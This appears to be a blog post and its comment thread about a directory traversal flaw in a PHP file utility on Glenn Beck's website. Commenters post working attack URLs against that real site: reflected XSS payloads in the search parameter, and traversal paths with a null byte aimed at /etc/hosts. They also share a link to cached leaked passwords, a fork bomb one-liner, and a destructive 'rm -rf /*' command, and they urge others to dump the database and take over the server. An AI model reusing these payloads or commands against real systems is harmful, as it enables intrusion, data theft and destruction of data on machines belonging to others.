Glenn Beck's website gives him something to cry about
Glenn Beck's website, it turns out, can be manipulated into doing strange and NSFW things by messing with the URL. An insecure PHP utility accessible at the site allows for shenanigans like directory traversal, exposing all sorts of things that should not be exposed. Like password files, and a user group named for Rush Limbaugh. [Thanks, Dean!]
Update: the discussion thread is down. Here's the Google cache of it.
24 Comments • Add a comment
Also, the linked site can be manipulated into falling down, if you BoingBoing it and they can't handle the traffic?
Software error:
Too many connections at Board/Mysql.pm line 31.
http://webcache.googleusercontent.com/search?strip=1&q=cache:http%3A%2F%2Fgreen-oval.net%2Fcgi-board.pl%2Fg%2Fthread%2F12376999
Google cache of board (currently down) with passwords. Get 'em before the cache gets pulled by Google....
Indeed. Rather than being dot dot slashed, the site is slashdotted.
Glenn Beck's website can also give you something to cry about: the realization that people actually listen to him.
This is devious, malicious hacking. Glenn Beck will not lie idle in the face of terrorist hackers. He will call for stronger anti-hacking laws.
He will call the cyber police, and consequences will never be the same.
Looks like nothing happened. Poor guy.
Kind of deserved it had anything ACTUALLY happened.
I was really rooting for them to get an email dump in Palinesque style.
@ romulusnr
I'm sure they can back trace that kind of thing easily.
Wow, that is epic. I love the huge Cybersecurity Carbonite ad on the site. "I trust Carbonite to protect my priceless computer files-you should too."
Oh and um:
http://www.glennbeck.com/search/results.php?q=%22%3E%3Cscript+type%3D%22text/javascript%22%3E+alert%28%27xCleverPoet+is+awesome+!%27%29+%3C/script%3E&submit.x=0&submit.y=0
Oh, haha.
http://www.glennbeck.com/search/results.php?q=%22%3E%3Cscript+type%3D%22text/javascript%22%3E+alert%28%27You+done+goofed!\n+Prepare+to+be+back-traced.%27%29+%3C/script%3E&submit.x=0&submit.y=0
Not exactly sure that modifying an existing URL is a crime. :-)
BTW the "user group named after rush limbaugh" -- This is apparently the main server for Premiere Radio Networks, and hosts more than just Glenn Beck's site but also Rush's, Steve Harvey's, Dr. Laura's, and other Premiere Radio hosts. So the "user group named after rush" is just the result of Red Hat's "User Private Group" paradigm which creates a group for every new user.
PS I know this solely from what has been posted to greenoval. IANAL, TNO, TINC, IYKWIMAIKYD.
When I follow the link, I get this:
You done goofed!
Prepare to be back-traced.
WTF?
Glen, are your website warnings/threats as incoherent as your show? wow!
Interesting! From that, I'm guessing that the "coast" user is for Coast to Coast AM, which is (sadly) another Premiere show...
wait, wait, I get it now....never mind, I'm a little slow today....
If anyone tells you to do a series of actions on your mac that ends with typing "rm -rf /*" and hitting enter, please don't do it.
You can do this though :(){ :|:& };: it won't hurt... much...
So besides the silly alert-box hacking, it looks like they were able to get the DB username and password. But it doesn't seem as if anyone has been adding or modifying files. But given that /b/ knows about this, that kind of self-restraint is simply not computable. So I'm guessing I'm missing something?
What does /b have to do with this? I mean, I assume they know by now, but I haven't seen any indication that they have anything to do with it.
Did anyone see the etc hosts file?
Not saying I did, that would be illegal, of course.
But my friend did.
http://media.glennbeck.com/app/getfile.php?filename=../../../../../../../../../../../../../../../../../../etc/httpd/conf/hosts
It seems to have internal map of other clear-channel hosts: http://glenbeck.pastebin.com/0G3F91hq
Ooops, malformed url, it's actually
http://media.glennbeck.com/app/getfile.php?filename=../../../../../../../../../../../../../../../../
../../etc/hosts%00
It's funny that a simple logical error like directory transversal is still a problem, it's been like what, 25 years?
lulz
Oh god! There is a 99% chance that you have root access to the website and 70% chance that you have root access to the server. This means that the online world now owns his website and server. Please somebody with balls and humor use it for something intelligent or dig through the server and find his private porn collection or something.
I wish boingboing had waited just a few more hours before publishing this, so that anonymous would have had time to work, they didn't figure it out until about 1pm EST.
I know for a fact that the mysql database was logged into and all of the tables dumped.
As far as I know, nobody modified the content of the site, but I believe that Mr Beck's mailing list will be up on a torrent soon.
Someone explain this to me, I've got no clue what it means.
So what may happen if someone actually downloaded a file from the server?
someone should call in to the radio program and say in a ridiculously exaggerated southern drawl "so, I heard you folks use red hat, you know there are commies associated with Linux (pause)OH MY GOD JEB, OH. MY. GAWD. GLENN BECK IS A COMMIE!" it would be quite funny I think.
Send a comment